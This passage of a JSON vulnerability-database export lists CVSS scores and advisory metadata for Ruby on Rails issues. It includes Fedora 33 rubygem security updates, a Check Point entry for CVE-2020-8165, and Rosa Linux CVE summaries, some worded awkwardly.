"PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1840", "CVE-2020-8167"], "modified": "2020-05-26T22:38:40", "id": "H1:189878", "href": "https://hackerone.com/reports/189878", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:36:55", "description": "A remote code execution vulnerability exists in Ruby On Rails. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-29T00:00:00", "type": "checkpoint_advisories", "title": "Ruby On Rails Remote Code Execution (CVE-2020-8165)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2020-11-29T00:00:00", "id": "CPAI-2020-1223", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2023-06-06T15:26:39", "description": "Ruby on Rails is a full-stack web framework optimized for programmer happin ess and sustainable productivity. It encourages beautiful code by favoring convention over configuration. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:18:00", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-rails-6.0.3.3-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:18:00", "id": "FEDORA:7AD1030BB654", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FU5SRTFS6WYRUXYCCTM5MGDX3NLEEJKH/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "A toolkit for building modeling frameworks like Active Record. Rich support for attributes, callbacks, validations, serialization, internationalization, and testing. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:18:00", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-activemodel-6.0.3.3-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:18:00", "id": "FEDORA:04C8E30BDAB3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/LJSOSPY7DZOM4T3HZ7CQWKVOPP3GEHAP/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "High-level wrapper for processing images for the web with ImageMagick or libvips. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:18:00", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-image_processing-1.11.0-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:18:00", "id": "FEDORA:61EBD30BDAB3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/V77VWTREGLCV4FYZJECGWKOTTNFELDBQ/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "Attach cloud and local files in Rails applications. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:18:00", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-activestorage-6.0.3.3-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:18:00", "id": "FEDORA:3313D30C0EF8", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PFKTD4YMAG7SHBGR3NHQAEP7VJSDQQQT/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:18:00", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-activesupport-6.0.3.3-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:18:00", "id": "FEDORA:4A6A3309B6F1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GO5HFESPLIQNFHB24NFZAB353VOPYCB2/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "Receive and process incoming emails in Rails applications. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:17:59", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-actionmailbox-6.0.3.3-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:17:59", "id": "FEDORA:6905030C0EF2", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RFUPYCMMB7Z2ZMQX6AW7I3NAR37BJI5A/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "Declare job classes that can be run by a variety of queueing backends. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:17:59", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-activejob-6.0.3.3-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:17:59", "id": "FEDORA:E04FA30C0EFD", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QRZEMAYGXVQHF5WFVJUDLEEOZNJOVIX4/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "Rails internals: application bootup, plugins, generators, and rake tasks. Railties is responsible to glue all frameworks together. Overall, it: * handles all the bootstrapping process for a Rails application; * manages rails command line interface; * provides Rails generators core; ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:18:00", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-railties-6.0.3.3-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:18:00", "id": "FEDORA:92FD1309B6F1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3TVKX2B2ESGFLM7F4MHZTA4XDWSPJ4P5/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "Simple, battle-tested conventions and helpers for building web pages. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:17:59", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-actionview-6.0.3.3-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:17:59", "id": "FEDORA:C779E30C0EFA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5EZPMRMP5NJUYGUVIEPYFOGLVDPWFW2N/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "Email on Rails. Compose, deliver, and test emails using the familiar controller/view pattern. First-class support for multipart email and attachments. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:17:59", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-actionmailer-6.0.3.3-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:17:59", "id": "FEDORA:8116230C0EF7", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/OCTEWRI3XID5GZOZTXA4X6UOPUSC2UYL/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "Edit and display rich text in Rails applications. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:17:59", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-actiontext-6.0.3.3-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:17:59", "id": "FEDORA:AF8C030C0EF2", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "Implements the ActiveRecord pattern (Fowler, PoEAA) for ORM. It ties databa se tables and classes together for business objects, like Customer or Subscription, that can find, save, and destroy themselves without resorting to manual SQL. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:18:00", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-activerecord-6.0.3.3-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:18:00", "id": "FEDORA:1BE4F30C0EF2", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BNFPHMTLAWYZJ6EWEYHFJQXYUVKY23UM/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "Structure many real-time application concerns into channels over a single WebSocket connection. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:17:59", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-actioncable-6.0.3.3-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:17:59", "id": "FEDORA:2DDE030C0EF7", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/D4VJEYQXG3YO2LEPJM4XXU5KUBHBSO6F/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:26:39", "description": "Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling ea sy unit/integration testing that doesn't require a browser. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T00:17:59", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rubygem-actionpack-6.0.3.3-2.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-05T00:17:59", "id": "FEDORA:98F1A30C0EF8", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XBLUWGVWDBEL4UVXFH5PAX643HSWO7YF/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "rosalinux": [{"lastseen": "2023-09-09T10:20:33", "description": "Software: ruby 2.0.0.648\nOS: Cobalt 7.9\n \nCVE-ID: CVE-2012-6684\nCVE-Crit: MEDIUM\nCVE-DESC: A cross-site scripting (XSS) vulnerability in the RedCloth 4.2.9 library for Ruby and earlier allows remote attackers to inject arbitrary web script or HTML via a javascript: URI. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2013-1812\nCVE-Crit: CRITICAL\nCVE-DESC: ruby-openid heme to 2.2.2.2 for Ruby allows remote OpenID providers to cause a denial of service (CPU consumption) via (1) a large XRDS document or (2) an XML object extension (XEE) attack. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2013-6459\nCVE-Crit: LOW\nCVE-DESC: A cross-site scripting (XSS) vulnerability in the will_paginate gem before version 3.0.5 for Ruby allows remote attackers to inject arbitrary web script or HTML via vectors containing generated pagination links. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2015-2963\nCVE-Crit: CRITICAL\nCVE-DESC: Prior to version 4.2.2, the gem-scrape for Ruby did not consider the content type value during media type checking, allowing remote attackers to download HTML documents and conduct cross-site scripting (XSS) attacks using a spoofed value. , as shown in image / jpeg. \nCVE-STATUS: Default\nCVE-REV: default\n \n \nCVE-ID: CVE-2015-4411\nCVE-Crit: HIGH\nCVE-DESC: mongodb :: BSON :: ObjecId.legal? Method in mongodb / bson-ruby before 3.0.4, used in rubygem-moped, allows remote attackers to cause a denial of service (resource consumption by workers) using a crafted string. NOTE. This issue is related to an incomplete fix for CVE-2015-4410. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2015-9096\nCVE-Crit: MEDIUM\nCVE-DESC: Net :: SMTP in Ruby before 2.4.0 is vulnerable to SMTP command injection via CRLF sequences in RCPT TO or MAIL FROM commands, as demonstrated by CRLF sequences immediately before and after the DATA substring. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2015-9097\nCVE-Crit: MEDIUM\nCVE-DESC: The mail gem before 2.5.5.5 for Ruby (aka Really Ruby Mail Library) is vulnerable to SMTP command injection via CRLF sequences in RCPT TO or MAIL FROM commands, as demonstrated by CRLF sequences immediately before and after DATA. substring. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2016-6582\nCVE-Crit: CRITICAL\nCVE-DESC: The Doorkeeper gem prior to version 4.2.0 for Ruby could allow remote attackers to conduct replay attacks or revoke arbitrary tokens by failing to implement the OAuth 2.0 token revocation specification. \nCVE-STATUS: default\nCVE-REV: Default\n \n \nCVE-ID: CVE-2017-1002201\nCVE-Crit: MEDIUM\nCVE-DESC: in haml versions prior to 5.0.0.beta.2, when using user input to perform tasks on the server, characters like &lt;&gt; \"'should be escaped properly. In this case, a character is missing'. An attacker could manipulate the input to introduce additional attributes, potentially executing code. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2017-9224\nCVE-Crit: CRITICAL\nCVE-DESC: The issue was found in Oniguruma 6.2.0, which was used in Oniguruma-mod in Ruby before 2.4.1 and mbstring in PHP before 7.1.5. Off-stack reads occur in match_at () during regular expression lookup. A logical error related to the check and access ordering in match_at () can lead to reading outside the valid range from the stack buffer. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2017-9225\nCVE-Crit: CRITICAL\nCVE-DESC: The issue was found in Oniguruma 6.2.0, which was used in oniguruma-mod in Ruby before 2.4.1 and mbstring in PHP before 7.1.5. Off-stack writes in onigenc_unicode_get_case_fold_codes_by_str () occur during regular expression compilation. Code point 0xFFFFFFFFFFFF is incorrectly handled in unicode_unfold_key (). An incorrectly formed regular expression can cause 4 bytes to be written off the end of the stack buffer of expand_case_fold_string () during a call to onigenc_unicode_get_case_fold_codes_by_str (), a typical stack buffer overflow. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: 